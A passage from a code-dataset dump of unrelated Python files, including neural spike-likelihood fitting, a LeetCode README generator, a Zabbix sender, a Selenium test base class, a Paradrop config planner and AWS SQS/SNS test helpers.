'''Computes the rate function of position and mark.\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n joint_model : fitted density model\n mean_rate : float\n occupancy : ndarray, shape (n_time,)\n\n Returns\n -------\n log_joint_mark_intensity : ndarray, shape (n_time,)\n\n '''\n multiunit, position = atleast_2d(multiunit), atleast_2d(position)\n is_spike = (np.any(~np.isnan(multiunit), axis=1) &\n np.all(~np.isnan(position), axis=1))\n not_nan_marks = np.any(~np.isnan(multiunit), axis=0)\n\n log_joint_mark_intensity = np.zeros((position.shape[0],))\n log_joint_mark_intensity[is_spike] = (\n np.log(mean_rate) +\n joint_model.score_samples(np.concatenate(\n (multiunit[is_spike][:, not_nan_marks], position[is_spike]),\n axis=1)) - np.log(occupancy[is_spike]))\n return log_joint_mark_intensity\n\n\ndef train_marginal_model(multiunit, position, density_model, model_kwargs):\n '''\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n density_model : class\n model_kwargs : dict\n\n Returns\n -------\n fitted_marginal_model : density_model class instance\n\n '''\n is_spike = np.any(~np.isnan(multiunit), axis=1)\n not_nan_position = np.all(~np.isnan(atleast_2d(position)), axis=1)\n return (density_model(**model_kwargs)\n .fit(atleast_2d(position)[is_spike & not_nan_position]))\n\n\ndef train_occupancy_model(position, density_model, model_kwargs):\n '''Fits a density model for computing the spatial occupancy.\n\n Parameters\n ----------\n position : ndarray, shape (n_time, n_position_dims)\n density_model : class\n model_kwargs : dict\n\n Returns\n -------\n fitted_occupancy_model : density_model class instance\n\n '''\n position = atleast_2d(position)\n not_nan_position = np.all(~np.isnan(atleast_2d(position)), axis=1)\n return density_model(**model_kwargs).fit(position[not_nan_position])\n\n\ndef train_joint_model(multiunit, position, density_model, model_kwargs):\n '''Fits a density model to the joint pdf of position and mark.\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n density_model : class\n model_kwargs : dict\n\n Returns\n -------\n fitted_joint_model : density_model class instance\n\n '''\n multiunit, position = atleast_2d(multiunit), atleast_2d(position)\n is_spike = (np.any(~np.isnan(multiunit), axis=1) &\n np.all(~np.isnan(position), axis=1))\n not_nan_marks = np.any(~np.isnan(multiunit), axis=0)\n\n return (density_model(**model_kwargs)\n .fit(np.concatenate((multiunit[is_spike][:, not_nan_marks],\n position[is_spike]), axis=1)))\n\n\ndef estimate_mean_rate(multiunit, position):\n '''Mean rate of multiunit.\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n\n Returns\n -------\n mean_rate : float\n\n '''\n is_spike = np.any(~np.isnan(multiunit), axis=1)\n not_nan = np.all(~np.isnan(atleast_2d(position)), axis=1)\n return np.mean(is_spike[not_nan])\n\n\ndef fit_multiunit_likelihood(position, multiunit, is_replay,\n place_bin_centers,\n density_model, model_kwargs,\n occupancy_marginal_model, occupancy_kwargs):\n '''Precompute quantities to fit the multiunit likelihood to new data.\n\n Parameters\n ----------\n position : ndarray, shape (n_time, n_position_dims)\n multiunit : ndarray, shape (n_time, n_features, n_electrodes)\n is_replay : bool ndarray, 
shape (n_time,)\n place_bin_centers : ndarray, shape (n_place_bins,)\n model : Class\n model_kwargs : dict\n\n Returns\n -------\n multiunit_likelihood : function\n\n '''\n joint_models = []\n marginal_models = []\n mean_rates = []\n occupancy_model = train_occupancy_model(\n position[~is_replay], occupancy_marginal_model, occupancy_kwargs)\n\n for m in tqdm(np.moveaxis(multiunit[~is_replay], -1, 0),\n desc='electrodes'):\n mean_rates.append(estimate_mean_rate(m, position[~is_replay]))\n joint_models.append(\n train_joint_model(m, position[~is_replay], density_model,\n model_kwargs))\n marginal_models.append(\n train_marginal_model(m, position[~is_replay],\n occupancy_marginal_model, occupancy_kwargs))\n\n return partial(\n multiunit_likelihood,\n place_bin_centers=place_bin_centers,\n occupancy_model=occupancy_model,\n joint_models=joint_models,\n marginal_models=marginal_models,\n mean_rates=mean_rates\n )\n","sub_path":"replay_identification/multiunit_likelihood.py","file_name":"multiunit_likelihood.py","file_ext":"py","file_size_in_byte":11872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"260058666","text":"import os, glob\nimport shutil\n\ndef extension(x):\n \"\"\"\n >>> extension(\"asdf.asdf\")\n '.asdf'\n \"\"\"\n lst = x.split(\".\")\n return \".\" + lst[-1]\n\ndef getProbNum(x):\n index = x.index(\".\")\n return x[0:index]\n\n# os.remove(\"README.md\")\nf = open(\"README.txt\",\"w+\")\n\nf.write(\"## LeetCode Solutions\\n\\n\")\n\nlst = []\nfor file in os.listdir(\"E:\\Documents\\GitHub\\LeetCodeDir\\LeetCode\"):\n lst.append(os.path.join(file))\nlst.sort()\n\nf.write(\"Problem # | Language | Difficulty\\n\")\nf.write(\":---: | :---: | :---:\\n\")\n\neasyNum, medNum, hardNum = 0, 0, 0\n\nfor x in lst:\n acceptedFileExts = [\".py\", '.java', '.sql', '.txt']\n\n if extension(x) not in acceptedFileExts:\n continue\n\n difficulty = \"\"\n language = \" (Unknown)\"\n multipleSolutions = \"\"\n\n if \"E\" in x:\n difficulty = \" Easy \"\n easyNum += 1\n elif \"M\" in x:\n difficulty = \"Medium\"\n medNum += 1\n else:\n difficulty = \" Hard \"\n hardNum += 1\n\n if \"PLUS\" in x:\n multipleSolutions = \" (Multiple Solutions)\"\n\n if x.endswith(\".py\"):\n language = \"Python\"\n elif x.endswith(\".txt\"):\n language = \"Text\"\n elif x.endswith(\".sql\"):\n language = \"SQL\"\n elif x.endswith(\".java\"):\n language = \"Java\"\n\n f.write(\"[\" + getProbNum(x) +\"](LeetCode/\" + x + \") | \" + language + \" | \" + difficulty + \"\\n\")\n\ntotal = easyNum + medNum + hardNum\nf.write(\"\\nEasy %: \"+ str(easyNum / total * 100)[:5] +\" \\n\")\nf.write(\"Medium %: \"+ str(medNum / total * 100)[:5] +\" \\n\")\nf.write(\"Hard %: \"+ str(hardNum / total * 100)[:5] +\" \\n\")\n\nf.write(\"\\n\\n\")\nf.write(\"[Project Euler Solutions](https://github.com/chrismarcok/Project-Euler)\\n\\n\")\nf.write(\"[My LeetCode Profile](https://leetcode.com/chrismarcok/)\")\n\nf.close()\nshutil.copyfile(\"README.txt\", \"README.md\")\nos.remove(\"README.txt\")\n","sub_path":"readme.py","file_name":"readme.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"295722788","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2011 Enrico Tröger \n# License: GNU GPLv2\n\n\"\"\"\nMinimal implementation of the Zabbix sender protocol in Python.\nIt should just show the basic idea, there is no error handling at all.\n\"\"\"\nimport json\nimport 
socket\nimport struct\nimport re\n\n_expr_info = re.compile(r'Processed \\d+ Failed (\\d+).+')\n\ndef get_zabbix_server(config_file='/etc/zabbix/zabbix_agentd.conf'):\n\tserver = None\n\twith open(config_file) as f:\n\t\tfor line in f:\n\t\t\tif line[:7] == 'Server=':\n\t\t\t\tserver = line[7:].strip()\n\treturn server\n\ndef send(host, key, value, zabbix_server = '127.0.0.1', port = 10051, ):\n\tHEADER = '''ZBXD\\1%s%s'''\n\t# just some data\n\tdata = '''{{\"request\":\"sender data\", \"data\":[ {{ \"host\":\"{}\", \"key\":\"{}\", \"value\":\"{}\"}} ] }} '''.format(host, key, value)\n\t\n\tdata_length = len(data)\n\tdata_header = struct.pack('i', data_length) + '\\0\\0\\0\\0'\n\t\n\tdata_to_send = HEADER % (data_header, data)\n\t\n\t# here really should come some exception handling\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tsock.connect((zabbix_server, port))\n\t\n\t# send the data to the server\n\tsock.send(data_to_send)\n\t\n\t# read its response, the first five bytes are the header again\n\tresponse_header = sock.recv(5)\n\tif not response_header == 'ZBXD\\1':\n\t\traise ValueError('Got invalid response')\n\t\n\t# read the data header to get the length of the response\n\tresponse_data_header = sock.recv(8)\n\tresponse_data_header = response_data_header[:4] # we are only interested in the first four bytes\n\tresponse_len = struct.unpack('i', response_data_header)[0]\n\t\n\t# read the whole rest of the response now that we know the length\n\tresponse_raw = sock.recv(response_len)\n\t\n\tsock.close()\n\t\n\tresponse = json.loads(response_raw)\n\treturn _expr_info.findall(response['info'])[0]\n","sub_path":"zabbix/pyzabbix_sender.py","file_name":"pyzabbix_sender.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"244801590","text":"'''\nhttp://www.pythonchallenge.com\n#6 url=\"http://www.pythonchallenge.com/pc/def/channel.html\"\nwe got the html comment \"\" in the web source code, then goto \"http://www.pythonchallenge.com/pc/def/zip.html\"\nwe got \"yes. find the zip. \".\nI guess it's not about the zip function in python, since there's no data in all the area.\nsomeone tell me that try to this address to get a zip file:\"http://www.pythonchallenge.com/pc/def/channel.zip\"\nthen we got lot of file,\n\nin the readme.txt, we know how to start this challenge:\nwelcome to my zipped list.\nhint1: start from 90052\nhint2: answer is inside the zip\n\nin the 90052.txt, we got below:\nNext nothing is 94191\n\ncollect the comment.\ncollect each files'comment in the zip file, and print the comment, got hockey by letters oxygen\ngoto \"http://www.pythonchallenge.com/pc/def/hockey.html\"\nit's in the air. 
look at the letters.\nthe letters is oxygen\n'''\nimport re\nfrom urllib import request\nimport zipfile\nfrom io import BytesIO\n\nurl = \"http://www.pythonchallenge.com/pc/def/channel.zip\"\nnn = '90052'\np1 = re.compile(r'Next nothing is [0-9]\\d*')\np2 = re.compile(r'[0-9]\\d*')\nlocalzf = BytesIO()\nwith request.urlopen(url) as f:\n zf = f.read()\n localzf.write(zf)\n files = zipfile.ZipFile(localzf)\ni=0\ncomments=[]\nwhile i < 1000:\n filename = nn+'.txt'\n s = files.read(filename).decode()\n print(filename,\"'s comment:\",files.getinfo(filename).comment)\n comments.append(files.getinfo(filename).comment.decode())\n print(str(i),s)\n if p1.match(s):\n nn = p2.search(s).group()\n else:\n print(\"It's the result: \",s)\n break\n i=i+1\nprint(\"\".join(comments))\n","sub_path":"pythonchallenge6.py","file_name":"pythonchallenge6.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"224469792","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\BaseTest.py\n# Compiled at: 2018-04-26 12:50:15\nimport unittest, json, os\nfrom selenium import webdriver\nfrom Action import Action\nfrom datetime import datetime\n\nclass BaseTest(unittest.TestCase):\n suite_data = object\n test_data = object\n execute_start_flow = False\n json_file = ''\n base_path = ''\n tests_info = None\n\n def __init__(self, test_name, json_file, suite_data, base_path, tests_info):\n super(BaseTest, self).__init__(test_name)\n self.json_file = json_file\n self.suite_data = suite_data\n self.base_path = base_path\n self.tests_info = tests_info\n self.info = {}\n\n def load_data(self):\n with open(self.json_file) as (json_data):\n json_text = json_data.read()\n return json.loads(json_text)\n\n def setUp(self):\n self.test_data = self.load_data()\n self.info['test_name'] = self.test_data['name']\n self.info['json_file'] = os.path.basename(self.json_file)\n self.info['start'] = str(datetime.now())\n if 'browser' in self.test_data:\n browser = self.test_data['browser']\n if browser == 'chrome':\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--incognito')\n self.d = webdriver.Chrome(chrome_options=chrome_options)\n elif browser == 'edge':\n self.d = webdriver.Edge()\n elif browser == 'firefox':\n self.d = webdriver.Firefox(executable_path=os.path.dirname(os.path.abspath(__file__)) + '\\\\geckodriver.exe')\n else:\n self.d = webdriver.Chrome()\n if 'implicitly_wait' in self.test_data:\n self.d.implicitly_wait(int(self.test_data['implicitly_wait']))\n else:\n self.d.implicitly_wait(3)\n self.d.get('data:text/html;charset=utf-8,
      executing test ' + self.test_data['name'] + '...
      ')\n self.d.maximize_window()\n\n def run_test(self):\n if self.execute_start_flow:\n self.execute_flow(self.suite_data['started_flow'])\n result = False\n try:\n try:\n self.execute_flow(self.test_data['flow'])\n result = True\n except Exception as e:\n self.info['message'] = str(e)\n\n finally:\n self.d.quit()\n self.info['end'] = str(datetime.now())\n self.info['result'] = str(result).lower()\n self.tests_info.append(self.info)\n\n def execute_flow(self, flow):\n action = Action(self.d, self.base_path)\n self.info['flow'] = []\n index = 0\n for step in flow:\n action.execute_step(step)\n step['index'] = index\n index += 1\n step['result'] = 'true'\n self.info['flow'].append(step)","sub_path":"pycfiles/SeleniumFramework-0.1.8-py2.7/BaseTest.py","file_name":"BaseTest.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"450845669","text":"###################################################################\n# Copyright 2013-2016 All Rights Reserved\n# Authors: The Paradrop Team\n###################################################################\n\n\"\"\"\nThis module generates update plans for a host configuration operation. It is\nseparate from the modules that generate plans for chute operations because we\nonly need to do a subset of the operations.\n\"\"\"\n\nfrom paradrop.base.output import out\nfrom paradrop.core.config import airshark, devices, haproxy, network, configservice, hostconfig, reservations, services, zerotier\n\nfrom . import plangraph\n\n\n# Update types that apply changes from host configuration.\nCONFIG_CHANGING_TYPES = set([\n \"inithostconfig\",\n \"sethostconfig\",\n \"patchhostconfig\"\n])\n\n\ndef generatePlans(update):\n out.verbose(\"%r\\n\" % (update))\n\n # Detect system devices and set up basic configuration for them (WAN\n # interface, wireless devices). These steps do not need to be reverted on\n # abort.\n #\n # checkSystemDevices may reboot the machine if expected devices are\n # missing.\n #\n # abortNetworkConfig is added as an abort command here so that it runs when\n # config.network.getNetworkConfig or just about anything else fails.\n #\n # reloadAll is added as an abort command here so that it runs when any of\n # the set* plans fail and back out.\n update.plans.addPlans(plangraph.STRUCT_GET_SYSTEM_DEVICES,\n (devices.getSystemDevices, ),\n (network.abortNetworkConfig, ))\n update.plans.addPlans(plangraph.CHECK_SYSTEM_DEVICES,\n (devices.checkSystemDevices, ))\n\n update.plans.addPlans(plangraph.STRUCT_GET_RESERVATIONS,\n (reservations.getReservations, ))\n\n update.plans.addPlans(plangraph.STRUCT_GET_HOST_CONFIG,\n (hostconfig.getHostConfig, ))\n\n # Save current network configuration into chute cache (key: 'networkInterfaces')\n update.plans.addPlans(plangraph.STRUCT_GET_INT_NETWORK,\n (network.getNetworkConfig, ))\n\n # Start haproxy. 
This does not depend on the host config, and we want\n # it setup even in cases where applying the host config failed.\n update.plans.addPlans(plangraph.RECONFIGURE_PROXY,\n (haproxy.reconfigureProxy, ))\n\n if update.updateType in CONFIG_CHANGING_TYPES:\n # Save current host configuration to disk.\n update.plans.addPlans(plangraph.STRUCT_SET_HOST_CONFIG,\n (hostconfig.setHostConfig, ),\n (hostconfig.revertHostConfig, ))\n\n # Apply host configuration to system configuration.\n update.plans.addPlans(plangraph.STRUCT_SET_SYSTEM_DEVICES,\n (devices.setSystemDevices, ),\n (configservice.reloadAll, ))\n\n # Apply zerotier configuration.\n update.plans.addPlans(plangraph.ZEROTIER_CONFIGURE,\n (zerotier.configure, ))\n\n # Apply Airshark configuration.\n update.plans.addPlans(plangraph.AIRSHARK_CONFIGURE,\n (airshark.configure, ))\n\n # Configure telemetry service.\n update.plans.addPlans(plangraph.TELEMETRY_SERVICE,\n (services.configure_telemetry, ))\n\n # Reload configuration files\n todoPlan = (configservice.reloadAll, )\n update.plans.addPlans(plangraph.RUNTIME_RELOAD_CONFIG, todoPlan)\n\n # Reload configuration files if aborting. This needs to happen at the\n # right place in the update pipeline such that UCI files have been\n # restored to their previous contents.\n todoPlan = (configservice.reload_placeholder, )\n abtPlan = (configservice.reloadAll, )\n update.plans.addPlans(plangraph.RUNTIME_RELOAD_CONFIG_BACKOUT, todoPlan, abtPlan)\n","sub_path":"paradrop/daemon/paradrop/core/plan/hostconfig.py","file_name":"hostconfig.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"267414412","text":"import sys\nfrom itertools import combinations\nsys.stdin = open('input_1486.txt', 'r')\n\nT = int(input())\n\nfor t in range(1, T+1):\n N, B = map(int, input().split())\n lst = [x for x in range(N)]\n num = []\n for i in range(1, N+1):\n num += list(combinations(lst, i))\n\n tall = list(map(int, input().split()))\n result = []\n for j in range(len(num)):\n ans = 0\n for k in num[j]:\n ans += tall[k]\n if ans >= B:\n result.append(ans)\n print('#{} {}'.format(t, min(result)-B))\n\n","sub_path":"SWEA/1486_장훈이의높은선반.py","file_name":"1486_장훈이의높은선반.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"280925547","text":"import tkinter\r\nimport sys\r\n\r\nclass MenuBar(tkinter.Menu):\r\n def __init__(self, parent):\r\n tkinter.Menu.__init__(self, parent)\r\n\r\n fileMenu = tkinter.Menu(self, tearoff=False)\r\n self.add_cascade(label=\"File\",underline=0, menu=fileMenu)\r\n fileMenu.add_command(label=\"Exit\", underline=1, command=self.quit)\r\n\r\n def quit(self):\r\n sys.exit(0)\r\n\r\nclass App(tkinter.Tk):\r\n def __init__(self):\r\n tkinter.Tk.__init__(self)\r\n menubar = MenuBar(self)\r\n self.config(menu=menubar)\r\n\r\nif __name__ == \"__main__\":\r\n app=App()\r\n app.mainloop()","sub_path":"class/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"468511218","text":"def rotate(n):\n no = str(n)\n temp = no[-1]\n temp += no[0:len(no)-1]\n return int(temp)\n\nsum = 0\nfor i in range(10, 10**100):\n n = rotate(i)\n if i>n:\n if (i / n) == int(i/n):\n sum += int(str(i)[len(str(i)) - 5 :])\n #print(i)\n else:\n if (n / i) == int(n / i):\n sum += int(str(n)[len(str(n)) - 5:])\n 
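# Added worked example: rotate(142857) == 714285 and 714285 == 5 * 142857,\n            # so for i = 142857 this branch adds the last five digits of n (14285) to sum.\n            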
#print(n)\nprint(sum)","sub_path":"168.py","file_name":"168.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"157950508","text":"# assumes credentials are in ~/.aws/credentials\nimport boto3, re\nimport argparse\n#import sns_ops\nimport json, random\nfrom robot.api import logger\n\n################# Generalized Queue Functions ###########\ndef createQueueAndSubscribe(name_prefix, topicArn):\n name = name_prefix + str(random.randint(1, 999999))\n create_queue_status, name = createQueue(name)\n if create_queue_status:\n attribute_status, sqs_queue = getQueueAttributes(name)\n if attribute_status:\n policy_status, response = addSnsReadPolicy(name, topicArn)\n if policy_status:\n subscribe_status, response = subscribeSqsQueueToTopic(sqs_queue, topicArn)\n if subscribe_status:\n subscriptionArn = response['SubscriptionArn']\n return True, name, subscriptionArn\n else:\n return False, \"Failed while subscribing to topic\", None\n else:\n return False, \"Failed while adding sns read policies\", None\n else:\n return False, \"Failed getting queue attributes\", None\n else:\n return False, \"Failed creating the queue\", None\n\ndef checkQueueExists(name):\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n # logger.console('################ line # 84 #########################')\n logger.console('queue name is')\n logger.console(name)\n try:\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n logger.console('Queue Exists ' + str(sqs_url))\n respone = True\n except Exception as e:\n # logger.console('################ line # 91 #########################')\n logger.console('Exception while checking queue exists ' + str(e))\n respone = False\n finally:\n # logger.console('################ line # 95 #########################')\n logger.console('Response of check if queue exists ' + str(respone))\n return respone\n\ndef createQueue(name):\n try:\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Creating queue ' + name)\n response = sqs_client.create_queue(QueueName=name)\n logger.console('Response of creating queue ' + str(response))\n return True, name\n except Exception as e:\n logger.console('Exception while creating a queue ' + str(e))\n return False, \"Failed while creating sqs queue\"\n\n\ndef getTotalSubscriptionCount():\n sns_client = boto3.client('sns', region_name='us-west-2')\n response = sns_client.list_subscriptions()\n try:\n totalSubscriptions = len(response['Subscriptions'])\n return True, totalSubscriptions\n except Exception as e:\n return False, e\n\ndef listAndDeleteAllSubscriptions():\n sns_client = boto3.client('sns', region_name='us-west-2')\n response = sns_client.list_subscriptions()\n logger.info(response)\n try:\n totalSubscriptions = len(response['Subscriptions'])\n logger.info(\"total Subscriptions are:\" + str(totalSubscriptions))\n for subscription in response['Subscriptions']:\n subscriptionArn = subscription['SubscriptionArn']\n unsubscribeResponse = sns_client.unsubscribe(SubscriptionArn=subscriptionArn)\n return True, response\n except Exception as e:\n return False, e\n\n\ndef deleteSubscription(subscriptionArn):\n sns_client = boto3.client('sns', region_name='us-west-2')\n try:\n unsubscribeResponse = sns_client.unsubscribe(SubscriptionArn=subscriptionArn)\n return True, unsubscribeResponse\n except Exception as e:\n return False, e\n\ndef deleteQueue(name):\n try:\n sqs_client = boto3.client('sqs', 
region_name='us-west-2')\n logger.console('Deleting queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.delete_queue(QueueUrl=sqs_url)\n return True, response\n except Exception as e:\n # logger.console('################ line # 91 #########################')\n logger.console('Exception while checking queue exists ' + str(e))\n return False, str(e)\n\ndef getQueueAttributes(name):\n try:\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.get_queue_attributes(QueueUrl=sqs_url, AttributeNames=['All'])\n logger.console('Response of get queue attributes ' + str(response))\n return True, response\n except Exception as e:\n logger.console('Exception while getting a queue attributes' + str(e))\n return False, \"Failed while getting sqs queue attributes\"\n\ndef subscribeSqsQueueToTopic(sqs_queue, topic_arn):\n try:\n sns_client = boto3.client('sns', region_name='us-west-2')\n # logger.console('################ line # 59 #########################')\n response = sns_client.subscribe(TopicArn=topic_arn, Protocol='sqs',\n Endpoint=sqs_queue['Attributes']['QueueArn'], ReturnSubscriptionArn=True)\n # logger.console('################ line # 61 #########################')\n logger.console('Response of Subscribing to topic ' + str(response))\n # logger.console('################ line # 63 #########################')\n logger.info(\"subscription message response\")\n logger.info(response)\n return True, response\n except Exception as e:\n logger.console('Exception while subscribing to topic ' + str(e))\n logger.console('################ line # 67 #########################')\n return False, \"Failed while subscribing sqs queue to topic\"\n\n\ndef read(name):\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Receiving from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, MaxNumberOfMessages=10, WaitTimeSeconds=20)\n logger.console('Response of reading queue ' + str(response))\n return response\n\n\n############## PSM Queue Functions ##############\ndef readAndLogAndDeleteMessagePSM(name):\n status, sqs_queue = getQueueAttributes(name)\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n try:\n all_messages = response['Messages']\n except KeyError:\n logger.info('No messages on the queue!')\n all_messages = []\n return True, \"No more messages in the queue\", '', '', all_messages\n\n for message in all_messages:\n logger.info('################ line # 125 #########################')\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n body = message['Body']\n data = json.loads(body)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n logger.info('event is:')\n logger.info(event)\n eventPID = event['eventData']['productInstance']['productInstanceId']\n logger.info('################ line # 136 #########################')\n logger.info('########## 
productInstanceId from event is ###################### ')\n logger.info(eventPID)\n oldState = event['eventData']['oldState']\n newState = event['eventData']['newState']\n logger.info('old and new states are ' + str(oldState) + ' ' + str(newState))\n #sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\ndef readAndDeleteMessagePSMForGivenState(name, oldState, newstate, pidMapping, *argv):\n logger.info(\"input is:\")\n logger.info(argv)\n logger.info(oldState)\n logger.info(newstate)\n logger.info(\"argv=\"+str(argv))\n\n status, sqs_queue = getQueueAttributes(name)\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n try:\n all_messages = response['Messages']\n except KeyError:\n logger.info('No messages on the queue!')\n return True, pidMapping, \"No more messages in the queue\"\n for message in all_messages:\n #logger.info('################ line # 73 #########################')\n #logger.info('################ line # 132 #########################')\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n body = message['Body']\n data = json.loads(body)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n logger.info('event is:')\n logger.info(event)\n eventPID = event['eventData']['productInstance']['productInstanceId']\n logger.info('########## productInstanceId from event is###################### ')\n logger.info(eventPID)\n if eventPID in argv:\n logger.info('found a match of event for given product instance id' + str(eventPID))\n characteristics = event['eventData']['productInstance']['characteristics']\n\n if event['eventData']['newState'] == newstate and event['eventData']['oldState'] == oldState:\n #logger.info('################ line # 506 #########################')\n pidMapping[eventPID] = [event['eventData']['oldState']]\n #logger.info('################ line # 507 #########################')\n logger.info(pidMapping)\n pidMapping[eventPID].append(event['eventData']['newState'])\n #logger.info('################ line # 511 #########################')\n #logger.info(pidMapping)\n\n if len(event['eventData']['productInstance']['prices'])>0:\n spbPrice_Category = event['eventData']['productInstance']['prices'][0]['characteristics'][0]['value']\n pidMapping[eventPID].append(spbPrice_Category)\n else:\n logger.info(\"fulfillment!\")\n pidMapping[eventPID].append(0)\n #logger.info('################ line # 515 #########################')\n #logger.info(pidMapping)\n pidMapping[eventPID].append('')\n pidMapping[eventPID].append('')\n pidMapping[eventPID].append('')\n pidMapping[eventPID].append('')\n\n productKind = event['eventData']['productInstance']['kind']\n pidMapping[eventPID][5] = productKind\n #logger.info('################ line # 518 #########################')\n for characteristic in characteristics:\n try:\n #logger.info(\"char name in loops is:\")\n #logger.info(characteristic['name'])\n if characteristic['name'] == 'PSM_PRODUCT_KIND':\n #logger.info('################ line # 523 #########################')\n #logger.info(\"detail char is:\")\n 
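# Added note: the branches below fill fixed slots in pidMapping[eventPID] -- [3] PSM_PRODUCT_KIND, [4] SPB:billingAccountId, [6] SPB:serviceFileLocationId.\n                            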
#logger.info(characteristic)\n                            #logger.info('################ line # 529 #########################')\n                            psmProductKind = characteristic['value']\n                            #logger.info('################ line # 531 #########################')\n                            #logger.info(\"psmProductKind is:\")\n                            #logger.info(psmProductKind)\n                            pidMapping[eventPID][3] = psmProductKind\n                            #logger.info('################ line # 535 #########################')\n                            #logger.info(pidMapping)\n                        if characteristic['name'] == 'SPB:billingAccountId':\n                            #logger.info('################ line # 539 #########################')\n                            spbBillingAccount = characteristic['value']\n                            #logger.info(\"spbBillingAccount is:\")\n                            #logger.info(spbBillingAccount)\n                            pidMapping[eventPID][4] = spbBillingAccount\n                            #logger.info('################ line # 544 #########################')\n                            #logger.info(pidMapping)\n                        if characteristic['name'] == 'SPB:serviceFileLocationId':\n                            logger.info('################ line # 367 #########################')\n                            serviceFileLocationId = characteristic['value']\n                            logger.info(\"serviceFileLocationId is:\")\n                            logger.info(serviceFileLocationId)\n                            pidMapping[eventPID][6] = serviceFileLocationId\n                            logger.info('################ line # 544 #########################')\n                            logger.info('after serviceFileLocationId' + str(pidMapping))\n\n                    except Exception as e:\n                        #logger.info('################ line # 179 #########################')\n                        # fixed: '+ str(e)' previously sat outside the call, adding a string to logger.info's None return value\n                        logger.info('SPB:billingAccountId And/OR PSM_PRODUCT_KIND missing in PSM event: ' + str(e))\n                        sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n                #logger.info('################ line # 555 #########################')\n                count = len(pidMapping)\n                #logger.info(\"length of pid mapping dict inside python is:\")\n                #logger.info(count)\n                #logger.info('################ line # 558 #########################')\n                if count == len(argv):\n                    logger.info('RETURNING')\n                    return True, pidMapping, event\n            else:\n                logger.info(\"contains PID but new state is not \" + str(newstate) + \" and is: \" + str(event['eventData']['newState']))\n                sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n        else:\n            #logger.info('################ line # 566 #########################')\n            sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\n    #logger.info('################ line # 560 #########################')\n    #logger.info('################ line # 562 #########################')\n    logger.info('did not find a match for all product instance ids in PSM SNS' + str(argv))\n    return False, pidMapping, all_messages\n\n\n\ndef readAndDeleteMessagePSMForGivenCharacteristics(name, producInstanceId, characteristicsName):\n    status, sqs_queue = getQueueAttributes(name)\n    message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n    logger.console(\"message count 